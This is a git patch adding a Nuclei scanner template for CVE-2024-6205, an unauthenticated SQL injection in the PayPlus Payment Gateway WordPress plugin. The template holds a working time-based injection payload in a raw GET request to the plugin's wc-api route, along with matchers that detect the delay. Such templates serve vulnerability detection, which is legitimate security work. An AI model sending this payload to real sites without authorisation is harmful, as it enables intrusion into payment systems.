From 1157e107966aad2c763f411fa6fce655669cd101 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 19 Jul 2024 21:36:26 +0300 Subject: [PATCH] add CVE-2024-6205 --- http/cves/2024/CVE-2024-6205.yaml | 50 +++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6205.yaml diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml new file mode 100644 index 0000000000..53a20adcd6 --- /dev/null +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-6205 + +info: + name: PayPlus Payment Gateway < 6.6.9 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability. + remediation: Fixed in 6.6.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-6205 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6205 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection + - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087/ + - https://github.com/20142995/nuclei-templates + classification: + epss-score: 0.00043 + epss-percentile: 0.09301 + metadata: + max-request: 1 + vendor: PayPlus LTD + product: PayPlus Payment Gateway + framework: wordpress + publicwww-query: "/wp-content/plugins/payplus-payment-gateway" + tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin + +http: + - raw: + - | + @timeout 20s + GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 302' + condition: and + + - type: word + part: body + words: + - '-1' + + - type: word + part: content_type + words: + - 'text/html'